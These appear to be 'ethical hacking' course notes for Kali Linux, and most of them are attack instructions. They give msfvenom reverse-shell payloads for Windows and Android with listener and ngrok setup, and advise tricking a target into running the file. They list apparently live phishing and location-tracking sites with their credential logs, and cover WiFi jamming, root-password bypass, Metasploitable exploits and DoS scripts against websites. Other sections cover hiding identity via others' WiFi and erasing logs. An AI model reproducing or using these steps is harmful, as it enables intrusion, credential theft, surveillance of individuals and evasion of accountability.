PART 01 | ETHICAL HACKING WITH KALI LINUX

01 | Kali Linux Basics

Kali : Introduction
Kali is a special OS used by ETHICAL HACKERS and PENTESTERS.
It is based on DEBIAN LINUX.

Kali : History
Its older name was BACK TRACK.
Kali is renamed after its 6th VERSION.
6th VERSION is known as KALI LINUX.
Competitor : Parrot Security OS | BlackArch | BlackBox

Kali : Download and Importing in Virtual Box

The ways to use KALI LINUX :
1] Install on physical system - Not recommended
2] Using LIVE KALI USB Drive - Not recommended
3] Installing on VIRTUAL BOX - Most Preferred Choice
4] Using OVA file - BEST.

OVA = Open Virtual Appliance > Oracle Virtual Box

Practical :
kali > ova > Virtual Box > File > Import Appliance > KALI.OVA > NEXT > FINISH
Processing...
Kali OS.
Username : KALI / KALI
Kali : Basic Commands

ifconfig > IP details - ether | inet

ping > Remote system LIVE or NOT
mkdir FOLDERNAME > Create Folder
nano FILENAME.TXT > Create file | cont +s | cont+x
rm -rf FOLDERNAME > Delete folder
rm FILENAME.TXT > Delete file
cd FOLDERNAME > to go to any folder
cd .. > to get out from the CURRENT FOLDER
pwd > Print Working Directory - Live Folder Path
whoami > Current Login User Name
reboot > System restart
cp filename DESTINATION_PATH > File copy - /root/Desktop/aparichit/
mv filename DESTINATION_PATH > File Move

chmod +x *.* > To give execuation file permission to ALL FILES in a folder
bash FILENAME.sh > To execute .SH tools [ Shellcode Tools ]
python FILENAME.py > To execute .PY tools [ Python Tools ]

macchanger -s eth0 > Show current MAC address of ETH0 or WLAN0

ls > list content of the folder

git clone GITHUB_LINK_PAST_HERE > Downloading Software from GITHUB

[ Software is known as PACKAGE in KALI.
This package at github site known as GIT
Clone = Download or Copying the package to our system]

history > shows all past commands typed on the terminal screen
history -c > Clears history logs [ Sometimes doesnt work ;) ]

clear > clears the screen of terminal

cont+c > To cancel any ongoing process
exit > Terminal exit
Kali : General User and Root User
$ sign > Identifies this is a GENERAL OR STANDARD USER on KALI TERMINAL
# sign > Identifies this is a ROOT or ADMIN USER on KALI TERMINAL

Kali : Setup Root User Password

Open terminal > $ > sudo passwd root [ Enter ] > Pass : kali > New Pass : Root passsword set
here.
Repeat to confirm.
[ sudo = Super User Do = Same as RUN AS ADMINISTRATOR ]

Kali : User Management

Create user : useradd USERNAME
Delete User : userdel USERNAME
Change User Password : passwd USERNAME [ Enter ]

Kali : File Sharing with Windows

Virtual Box > Devices > Shared Folder > Shared Folder Settings >
Right side PLUS icon > Windows Folder > Tick : Auto Mount and Tick : Make Permanent >
Ok.,..
Verify : FILE SYSTEM > Left side... SHARED FOLDER will visible here.

Kali : Set Network Bridge or NAT

Virtual Box > Machine > Network > Right side, NAT => Bridge Adapter > Ok. Ok.
This will make your system on the SAME WIFI network so we can perform network practicals.

Kali : File And Folder Deletion

rm -rf FOLDERNAME > Delete folder
rm FILENAME > Delete Files

Kali : File Permissions

chmod +x *.*
Kali : Software Installation from GITHUB

Search in google : softwarename github , example : easysploit github

Open first link from google results
Find CODE button with a GREEN color, click on it, and COPY the link.
It is called the GIT LINK.

Installation Of Software :
1] Copy Tool Link from GITHUB
2] Open terminal and type the following command :
git clone PAST_GITLINK_HERE
Note : This will download the software folder on your system

3] After download, go to that folder using cd toolname

4] Give permission for execution : chmod +x *.*
5] Find INSTALLER, INSTALL, SETUP file with .sh or .py files in the tool folder
If exists..
Then run the files as below :
if file has .SH extension :> bash filename.sh
if file has .PY extension :> python filename.py
[ For python, if doesnt work, using python2, if doesnt work use python3, if doesnt work, dont
worry... jst DELETE it ;) ]

If this file doesnt exist, Skip this step.

6] Find REQUIREMENTS.TXT file in the folder

If exists..
Run the following command :
pip install -r requirements.txt

This requirements.txt contains useful support files for software, pip automatcally downlaods
and installs for us.

[Note if some error shows : install pip3 using apt install pip ]

If doesnt exist,
Skip this step.

7] Finally, find the file with name of the TOOL.

Run it using BASH or PYTHON depending on the file extension.
If there is no EXTENSION with the file
Just type the command like below :

./toolname
Kali : Software Installation from REPOSITORY

Like play store some apps are available from kali repository.
It is like a tools bank.
for those tools we have to type the following command :

apt install toolname

example :
apt install tor
apt install wireshark
apt install openssh-server

DOWNLOAD AND INSTALL THESE FOLDERS:

easysploit
easymacchanger
osi.ig
sherlock
slowloris
hulk
xlr8
zphisher
cupp
camphish
02 | Advanced Networking for Hackers

Network
Network is a group of computer systems that SHARES DATA and RESOURCE.

OSI Model
OSI = Open System Interconnection
Multiple companies devices can COMMUNICATE !!
7 Layers : International Standard

TCP/IP Protocols
TCP = Transmission Control Protocol
Send and Recieve

IP = Internet Protocol
Addressing

Working of HTTP and HTTPS

HTTP = Hypertext Transfer Protocol
Port : 80 or 8080
HTTPS = Hypertext Transfer Protocol SSL [ SSL = Secure Socket Layer]
Port : 443

[ TLS = Transport Level Security ]

Working of FTP
FTP = File Transfer Protocol
Work : Use to DOWNLOAD or UPLOAD files to SERVER
Port : 21

Working of DNS
DNS = Domain Name Server or System
Work : Translates DOMAIN NAME to IP ADDRESS
Port : 53

Working of DHCP
DHCP = Dynamic Host Control Protocol
Work : Automatically assign IP Address to connected systems
Port : 67

Working of SMTP
SMTP = Simple Mail Transfer Protocol
Work : Sending of MAIL
Port : 25
Working of POP3 and IMAP
POP3 = Post Office Protocol version 3
Work : Receiving Mails
Port : 110

IMAP : Internet Message Access Protocol

Work : Receiving Mails
Port : 143

Working of TELNET
Work : Remote Control of the System | SSH Server
Port : 23

Working of SSH
Work : Remote Control of the System
Port : 22

Working of NTP
Work : Network Time Control and Management
Port: 123
03 | Server Management on Kali

What is SERVER ?
Any system that provides specific SERVICE is known as SERVER.

What is CLIENT ?
Any system that USES or REQUEST service from the SERVER is known as Client.

* Server or Client is a SOFTWARE, And when we install that on a hardware that hardware
becomes a SERVER or CLIENT.

SERVER 01 | SSH SERVER SETUP

Open Terminal
Install SSH Server Software :
apt-install openssh-server
nano /etc/ssh/sshd_config
Edit this :
#PermitRootLogin Prohibit-Password
Change :
Remove Hash
Replace Prohibit-Password with : yes

Save the file and exit : cont+s | cont+x

Starting SSH Server ?

Start : service ssh start
Status : service ssh status
Stop : service ssh stop

On Windows Side ?
Download and install any SSH Client Utility:
MobaXterm Download.
Run the tool
Left side : SESSIONS > IP = Kali System SSH SERVER >
Terminal : USERNAME and PASS [ KALI ]
...
Now WE CAN CONTROL KALI using SSH SERVER.
SERVER 02 | WEB SERVER SETUP

Setup Web Server on Kali

Apache2

Start : service apache2 start

Stop : service apache2 stop
Status : service apache2 status

Files ?
/etc/var/www/html
04 | Identity Changing

Change IP Address on Kali

Note :
Dont change your IP, Always use OTHERS WIFI Network.
Remember CCTV Camera and Changing of MAC Address is must.

Change MAC Address on Kali

Method 01 | Manually
macchanger -s eth0 => shows current mac address of system
ifconfig eth0 down => disables ethernet nic
macchanger -r eth0 => changes mac of ethernet nic
ifconfig eth0 up => enables ethernet nic
macchanger -s eth0 => verify mac address is changed
macchanger -p eth0 => Reset mac address (get back original)

-s = show
-r = random mac address to set
eth0 = ethernet
wlan0 = wifi card

Method 02 | Using Tool

easymacchanger
run the tool
select any brand name and hit enter.
Thats it :)

Change OS and Browser on Kali

Extension : user agent switcher for firefox
05 | Social Media Hacking and Security

Phishig Project :

Instagram : http://cspsec.in/insta/
| Pass : /data.txt

Facebook : http://cspsec.in/facebook/
| Pass : /data.txt

Google : http://cspsec.in/google/
| Pass : /data.txt

IP and Camera Tracking Site :

https://datingrajkot.fun
| Images : /images/webcam_images/
| IP : /logfile.txt

GPS Tracker :
https://cspsec.in/
| Location : /long_lat.txt

MTF Download Site :

https://esec.club
06 | Password Hacking

Hacking Linux Password ?

Locked !!!
Restart.
2nd number option : select
E = EDIT
Code ...

Linux
ro quite splash
Replace with following :
rw initrd=/install/gtk/initrd.gz quite splash init=/bin/bash

cont+s
cont+x

passwd root
Set new pass here.

To run kali in GRAPHICAL MODE type the following two commands :

exec /sbin/init
Module 07 | Hacking with Metasploit

Meta = Big
Exploit = To break something

It is framework for hackers and pentesters to TEST security.

We can also develop our own features and add to metasploit software.

Important Terms :

Payload : Specific code to use to attack

Exploit : Executing payload on target system
lhost = local host > Ip address of our own attacker machine, kali
lport = local port > Port number of our own attacker machine, kali
rhost = remote host > target machine's ip
rport = remote port > target machine's port number
listener = program that waits for the connection from target computer

session -l = list available sessions

session -i 1 = selecting specific session from list

meterpreter = The terminal that we get after successful attack on target

We can only have the CLI access of target, not graphical.

-f = format of the file

R = Raw data > apk file created by metasploit

METASPLOIT main utilities :-

msfvenom => Used to create PAYLOAD, Apk or Exe file for TARGET
msfconsole => Used to create LISTENER, to connect with the TARGET

Methods of Connection :-
reverse_tcp => Once our payload is executed, target will COME TO CONNECT US.
bind_tcp => Once our payload is executed, we have to CONNECT to TARGET.
Note : reverse_tcp is BETTER, It will BYPASS Firewall of Target System.
HACKING with METASPLOIT

1] Create Payload using MSFVENOM

2] Create Listener using MSFCONSOLE
3] Send APK or EXE file to TARGET SYSTEM and convince him/her to RUN the file
4] Get METERPRETER terminal and Control the SYSTEM ! :)

1] Creating Payload
Hacking Windows :
msfvenom -p windows/meterpreter/reverse_tcp lhost=YOURIP lport=4444-f exe > hacker.exe

Hacking Android :
msfvenom -p android/meterpreter/reverse_tcp lhost=YOURIP lport=4444 R > hacker.apk

2] Starting Listener ?
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IPofKALI
set lport 4444
exploit

Windows Commands :
screenshare => Shows live screen of Target
webcam_stream => Shows live webcam stream from Target
shell => Shows command prompt of the Target

Android Commands :
hide_app_icon
dump_contacts
dump_sms
dump_calllog
webcam_snap

Protection :
Windows Defender Firewall should be ON and UPDATE regularly.
Android Play Protect should be ON and CHECK STATUS of it regularly, some spyware makes it
DISABLE.
Hacking Over Internet ?
Sign up Account on NGROK.COM
Sign in and Download NGROK For Linux
Extract Downloaded file and run the AUTHENTICATION TOKEN Command given on the
webpage

Get LHOST and LPORT for Payload ?

./ngrok tcp 4444
This will create a link, where you will find something like this :
2.tcp.ngrok.io:15078
Here,
LHOST = 2.tcp.ngrok.io
LPORT = 15078

Set Listener For Public Payload ?

Just change two things as below :
Set lhost 0.0.0.0
Set lport 4444

All other things are OK.

08 | Advanced Payload Execution in Target System
Method 01 | Download and Execute Payload Automatically
Try BAT file : Go to our TOOLSBOX

Method 02 | Download and execute file using AUTOIT

Try AU3 File : Go to our TOOLSBOX
Install AutoIT software and then compile the au3 file into EXE and Test

09 | WIFI Hacking and Security

Jam Wifi using MDK3
Airmon-ng start wlan0
Airmon-ng check kill
Airodump-ng wlan0
Find Channel number of the target
Final command :
Mdk3 wlan –c 6

Jam Wifi using Aircrack-ng

Not working properly.

Making of Wifi Jammer Device using NodeMCU 8266 Chip

Level 01 : Using NODE MCU ESP 8266 : Done

Creating WORD LIST | CUPP

Python3 cupp.py –i

Find Saved WIFI Passwords from Linux Systems

nano /etc/NetworkManager/system-connections/wifiname
psk=password

Hacking WPA and WPA2 without WORDLIST

Using WPS PIN ATTACK
Tool : Reaver
reaver -i wlan0 -c 6 -b 00:23:69:48:33:95 –vv

Cracking WPA and WPA2 Using a Wordlist

Not working.
10 | Tracking Person
Information Gathering :
Track IP Address of the Person
Track Picture of the Person

Site : datingrajkot.fun
Photo Link : datingrajkot.fun/images/webcam_images
IP Link : datingrajkot.fun/logfile.txt

Instagram Information Gathering

Tool : osi.ig
Use : To find basic details about Instagram user without login to Instagram.

Python3 main.py –u USERNAME

Example : python3 main.py –u aparichit85

Sherlock : Finding Same Usernames on Different Sites of Internet

Use : Finding same usernames on different sites to find profile of same person on Internet

Python3 sherlock aparichit85

 PART 02 | PENETRATION TESTING

01 | Penetration Testing Introduction

Introduction
Penetration Testing means TESTING SECURITY of DEVICE or SERVER or USER COMPUTER.
Hacking with legal permission is known as PENETRATION TESTING.
The Person who does these tests is known as PENTESTER or PENETRATION TESTER.

Types of Penetration Testing : BlackBox | WhiteBox | GrayBox

BlackBox
In this type of pentest, Only company name is given to the PENTESTERS.
All other information like site, ip address, ports and other details PENTESTER have to find.

WhiteBox
In this type of pentest, all info about the target device, server or system is given with legal
permission.

GreyBox
In this type of pentest, Some info is given and some are missing so PENTESTER have to find
the missing information.

Setup Networking in Lab

Machine > Network > NAT to Bridge > Check IP
02 | Information Gathering

Find IP Address of System

ifconfig

Find Network Range of Network

Find Network Devices
Find Servers
Find Open Ports on Target System
nmap -sV 192.168.0.1/24

Find Routers IP Address

ipconfig | findstr /i "Gateway"

Find CCTV DVRs IP Address

Find system that has only ONE port : 80 OR 8080 opened

Scanning with Net Discover

netdiscover

Find Operating System on Target System

nmap –O or T4 ip

Find Software Versions on Target System

nmap -sV ip

Find Service Version on Specific Port Number

nmap -p 80 ip
03| Hacking Metasploitable with Metasploit

SETUP Metasploitable SERVER on VIRTUAL BOX ?

Requirement : Metasploitable Server File

Process :
New > Linux > Name = SERVER > Next
Set RAM > Next
Set VDI > Next
Set HDD > Next
Ok.

Click on STORAGE
Select VDI File
Right side : Choose metasploitable.vdi file
ok.

Understanding Vulnerability
Vulnerability is a weakness in the software or system that can be misused by the hacker.

Finding Exploit
Once hacker know the vulnerability, they find the exploit code for the specific version and
then tries it.

Running Exploit
Exploits are run on metasploit msfconsole.

STEP 01 | Scanning
nmap -sV TargetIP
-sV = Service Version
SERVER : Open port, Software, Software Version

STEP02 | Searching Exploit Metasploit Commands on Internet

21 | FTP | vsftpd 2.3.4
Google : exploit for vsftpd 2.3.4 rapid7

STEP 03 | Executing the EXPLOIT

msfconsole
And follow the commands found on Exploit Page
SERVER HACK 01 | FTP SERVER
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set rhost SERVERIP
exploit

SERVER HACK 01 | IRC SERVER

IRC = Internet Relay Chat

use exploit/unix/irc/unreal_ircd_3281_backdoor
set payload cmd/unix/reverse_perl
set rhost [target ip]
set lhost [attackbox ip]
exploit

SERVER HACK 03 | DOS ATTACK on WEB SERVER

use auxiliary/dos/http/slowloris
set RHOST TargetIP
exploit

SERVER HACK 04 | Hacking WEB SERVER

use exploit/multi/http/php_cgi_arg_injection
set RHOST TargetIP
exploit
04 | Website Hacking and Security

Scraping Complete Website

Tool : httrack

Find Files and Folders on the Target Website with DIRBUSTER

Directory Listing Vulnerability
Example : Our Website

Finding Vulnerability : Scanning Website with Online Service

pentest-tools.com

Finding Vulnerability : Scanning Website with Kali Linux Tool - Nikto

apt install nikto
nikto -u ipoftarget

Advanced DOS and DDOS Attack using Kali

slowloris
python3 slowloris.py TARGETIP -s 500

hulk
python hulk.py https://sitename.com
05 | Clearing Tracks

Removing Evidence from Kali Linux Terminal Command History

history -c or history -w
set +o history [ Disable
set -o history [ Enable

Removing Evidence from Windows Logs [ Windows OS ]

eventvwr

Removing Evidence from Pen Drive [ Overwrite with Low Level Format ]
Tool : Low Level Format Tool